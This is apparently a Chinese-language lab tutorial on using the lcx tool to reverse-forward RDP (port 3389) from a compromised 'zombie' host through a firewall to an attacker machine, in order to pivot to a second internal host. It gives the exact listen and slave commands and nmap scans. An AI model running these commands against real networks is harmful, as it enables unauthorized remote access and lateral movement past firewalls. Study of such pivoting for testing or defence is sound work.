lcx内网端口转发
Lcx实现内网端口转发
lcx是一款端口转发工具,有三个功能,第一个功能将本地端口转发到远程主机某个端口上(前提需要公网ip);
第二个功能将本地端口转发到本地另一个端口上;第三个功能是进行监听并进行转发使用。
案例:肉鸡1只开放了80端口,没有开放3389端口,我们将他的3389转发到自己的外网机的4444端口,然后连接上自己的外网机的4444之后,继续监听5555,
我们在内网的攻击机上通过访问5555端口,就可以连接到肉鸡1的远程桌面,进而访问肉鸡2
本机:192.168.17.123
中间主机(肉鸡1):网卡1:192.168.27.156 网卡2:192.168.17.110
肉鸡2:192.168.27.131
问题:肉鸡防火墙都是开启状态,中间主机只有80端口开放,其他端口关闭,如何去登录被攻击主机?
下面我们来做实验:
使用nmap都扫描一下肉鸡,看有哪些端口开放,nmap 192.168.17.110
Nmap 192.168.27.131
在本机上我们尝试访问肉鸡1, 192.168.17.110
肉鸡1访问肉鸡2, 192.168.27.131
当然因为是同一网段,所以这些都是可以被访问到的,可是我们要做的是让本机访问肉鸡2啊,
不能直接使用远程桌面登录,那么就想办法让肉鸡主动发起连接(sockets 连接)
首先先在肉鸡1上,上传lcx.exe文件,然后在本机上执行
本机:lcx.exe -listen 4444 5555 本机监听4444端口 5555端口空闲
肉鸡1上执行操作: lcx.exe -slave 192.168.17.123 4444 192.168.17.110 3389 (slave转发功能)
之后在本机上cmd上就会出现正在连接端口
本机上开启远程桌面,正常来说,我们直接192.168.17.110:3389就可以实现远程控制肉鸡1,但是只开放了80端口啊,
所以我们由内到外发起的连接,127.0.0.1:5555
之后就成功登录肉鸡1,并且访问肉鸡2了